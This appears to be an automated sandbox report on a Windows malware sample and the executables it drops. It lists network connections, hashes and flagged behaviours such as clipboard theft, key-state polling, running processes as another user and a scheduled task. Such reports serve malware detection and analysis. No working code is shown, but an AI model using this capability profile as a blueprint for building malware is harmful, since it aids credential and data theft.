Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50030
Source: unknown Network traffic detected: HTTP traffic on port 49905 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown Network traffic detected: HTTP traffic on port 49973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49962 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49878 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50031 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50020 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49935
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49784 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.60:443 -> 192.168.2.5:49800 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49930 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49993 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.5:49997 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:50030 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:50031 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:50043 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:50053 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.206.204:443 -> 192.168.2.5:50056 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.69.239.74:443 -> 192.168.2.5:50128 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EBEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 7_2_00EBEAFF
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EBED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 7_2_00EBED6A
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EBEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 7_2_00EBEAFF
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EAAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 7_2_00EAAA57
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00ED9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 7_2_00ED9576

System Summary
barindex
Binary is likely a compiled AutoIt script file
Source: cb428cafc9.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: cb428cafc9.exe, 00000007.00000002.3852269897.0000000000F02000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_fd86ad50-3
Source: cb428cafc9.exe, 00000007.00000002.3852269897.0000000000F02000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_f7384abe-b
Source: cb428cafc9.exe, 0000001A.00000000.2802596566.0000000000F02000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_fe66c846-9
Source: cb428cafc9.exe, 0000001A.00000000.2802596566.0000000000F02000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_a76fefa2-f
Source: cb428cafc9.exe, 00000045.00000002.4394162441.0000000000F02000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_2e4cdd46-a
Source: cb428cafc9.exe, 00000045.00000002.4394162441.0000000000F02000.00000002.00000001.01000000.00000009.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_4e032653-8
Source: cb428cafc9.exe.6.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_3f994fc1-7
Source: cb428cafc9.exe.6.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_0736a084-9
Source: random[1].exe.6.dr String found in binary or memory: This is a third-party compiled AutoIt script. memstr_94b46917-1
Source: random[1].exe.6.dr String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_27459c0f-2
PE file contains section with special chars
Source: xwZfYpo16i.exe Static PE information: section name:
Source: xwZfYpo16i.exe Static PE information: section name: .idata
Source: xwZfYpo16i.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .rsrc
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 4db5303091.exe.6.dr Static PE information: section name:
Source: 4db5303091.exe.6.dr Static PE information: section name: .rsrc
Source: 4db5303091.exe.6.dr Static PE information: section name: .idata
Source: 4db5303091.exe.6.dr Static PE information: section name:
PE file has a writeable .text section
Source: num[1].exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: num.exe.6.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process Stats: CPU usage > 49%
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EAD5EB: CreateFileW,DeviceIoControl,CloseHandle, 7_2_00EAD5EB
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EA1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 7_2_00EA1201
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EAE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 7_2_00EAE8F6
Creates files inside the system directory
Source: C:\Users\user\Desktop\xwZfYpo16i.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E48060 7_2_00E48060
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EB2046 7_2_00EB2046
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00EA8298 7_2_00EA8298
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E7E4FF 7_2_00E7E4FF
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E7676B 7_2_00E7676B
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00ED4873 7_2_00ED4873
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E4CAF0 7_2_00E4CAF0
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E6CAA0 7_2_00E6CAA0
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E5CC39 7_2_00E5CC39
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E76DD9 7_2_00E76DD9
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E5D071 7_2_00E5D071
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E491C0 7_2_00E491C0
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E5B119 7_2_00E5B119
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E61394 7_2_00E61394
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E61706 7_2_00E61706
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E6781B 7_2_00E6781B
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E619B0 7_2_00E619B0
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E5997D 7_2_00E5997D
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E47920 7_2_00E47920
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E67A4A 7_2_00E67A4A
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E67CA7 7_2_00E67CA7
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E61C77 7_2_00E61C77
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E79EEE 7_2_00E79EEE
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00ECBE44 7_2_00ECBE44
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: 7_2_00E61F32 7_2_00E61F32
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\num[1].exe 27E4A3627D7DF2B22189DD4BEBC559AE1986D49A8F4E35980B428FADB66CF23D
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exe Code function: String function: 006445C0 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: String function: 00E5F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: String function: 00E60A30 appears 46 times
Source: C:\Users\user\AppData\Local\Temp\1000332001\cb428cafc9.exe Code function: String function: 00E49CB3 appears 31 times
Uses 32bit PE files
Source: xwZfYpo16i.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: xwZfYpo16i.exe Static PE information: Section: ZLIB complexity 0.9982863589918256
Source: xwZfYpo16i.exe Static PE information: Section: pdwvfcxw ZLIB complexity 0.9948791375488428
Source: skotes.exe.0.dr Static PE information: Section: ZLIB complexity 0.9982863589918256
Source: skotes.exe.0.dr Static PE information: Section: pdwvfcxw ZLIB complexity 0.9948791375488428
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9995165532178217
Source: random[1].exe0.6.dr Static PE information: Section: wdneehld ZLIB complexity 0.9944067215043323
Source: 4db5303091.exe.6.dr Static PE information: Section: ZLIB complexity 0.9995165532178217
Source: 4db5303091.exe.6.dr Static PE information: Section: wdneehld ZLIB complexity 0.9944067215043323
